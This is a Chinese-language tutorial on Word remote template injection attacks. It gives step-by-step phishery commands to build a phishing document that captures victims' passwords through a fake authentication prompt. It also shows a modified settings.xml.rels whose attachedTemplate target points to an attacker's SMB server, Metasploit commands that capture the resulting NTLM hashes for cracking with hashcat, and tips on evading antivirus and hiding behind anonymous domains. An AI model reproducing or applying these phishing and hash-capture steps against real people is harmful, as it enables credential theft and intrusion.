Word模板注入攻擊
0x00 工具准備
phishery:https://github.com/ryhanson/phishery/releases
office版本:office 2010
0x01 什么是Word模板注入攻擊
Word模板注入攻擊就是利用Word文檔加載附加模板時的缺陷所發起的惡意請求而達到的攻擊目的,所以當目標用戶點開攻擊者發給他的惡意word文檔就可以通過向遠程服務器發送惡意請求的方式,來盜取他的各類賬號密碼
0x02 通過遠程模板注入盜取目標的各類普通賬號密碼
1、創建一個docx格式的word文件作為模板源文件,並編輯好文檔內容
2、利用模板源文件(test.docx)生成真正的釣魚文件
用到的工具為phishery,文檔開頭已提供下載鏈接(有多個平台的版本,此處用的linux下,在kali里操作的)
2.1 將test.docx放到工具phishery的目錄下
2.2 執行以下命令生成真正的釣魚文件
./phishery -u https://192.168.3.29/pass -i phishery.docx -o getpwd.docx
# 此處務必要注意,必須用 https 證書,都在當前目錄下
2.3 修改生成的釣魚文件的權限
chmod 777 getpwd.docx
3、啟動phishery服務端(模擬web服務器)
phishery會用當前目錄下的setting.json文件中的參數和證書作為默認配置,將記錄到的賬號密碼放在credentials.json中
./phishery
cat credentials.json
4、將釣魚文件getpwd.docx發送給目標
4.1 目標一點開文件就會彈出一個證書警告框,這一步很關鍵,只要用戶選擇了"是",我們的釣魚文件就會自動去連接遠程服務器並彈出基礎認證釣魚框,當目標輸完賬號以后就會被發送到我們自己的 smb 服務器上 
4.2 當目標在彈出的登錄框輸入內容過后,回到攻擊者的kali上,發現目標輸入的賬號密碼都已經被記錄
0x03 通過遠程模板注入盜取目標系統用戶密碼的ntlm hash
1、修改之前生成的getpwd.docx解壓出來的settings.xml.rels文件
1.1 將docx的文件后綴格式改為壓縮文件的格式,如zip,然后將文件解壓,找到word\_rels文件
1.2 編輯 settings.xml.rels,如下,定位到 Target 參數,將其改為 smb 的請求方式[即 UNC 路徑],同時也可以嘗試把 id[工具的敏感特征]改掉,以此躲避某些殺軟
原來的:
更改的:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="file://192.168.175.137/" Tar getMode="External"/>
</Relationships>
2、修改好之后將之前解壓出來的文件全部重新打包,並將后綴名字改回docx
2.1 全部重新打包為zip格式的壓縮包
2.2 將打包好的壓縮包的后綴更改為docx
3、回到攻擊機kali上,打開msf,啟動smb監聽,將后續收到的hash都存到passwd中
msf > use auxiliary/server/capture/smb
msf > set srvhost 192.168.3.29
msf > set johnpwfile passwd
msf > exploit
4、將制作好的釣魚文件getpwd發送給目標,當目標打開文件,攻擊者便可以獲取到他當前系統用戶的密碼hash
4.1 打開釣魚文件,目標這里沒有任何提示彈窗
4.2 再回到攻擊機,發現目標用戶系統的hash已經獲取到了
4.3 最后,只需要把這些 hash 丟到 hashcat 里去跑就行了
0x05 關於實際利用過程中的一些注意事項
- 需要一個靠譜的證書
- 一個靠譜高匿的域名
- 這種攻擊方式的好處在於它並不依賴目標所使用的操作系統,完全依靠 word 自身特性來完成,所以有更強的適應性
0x06 來源
《Word 模版注入攻擊詳細利用過程 》--By Klion
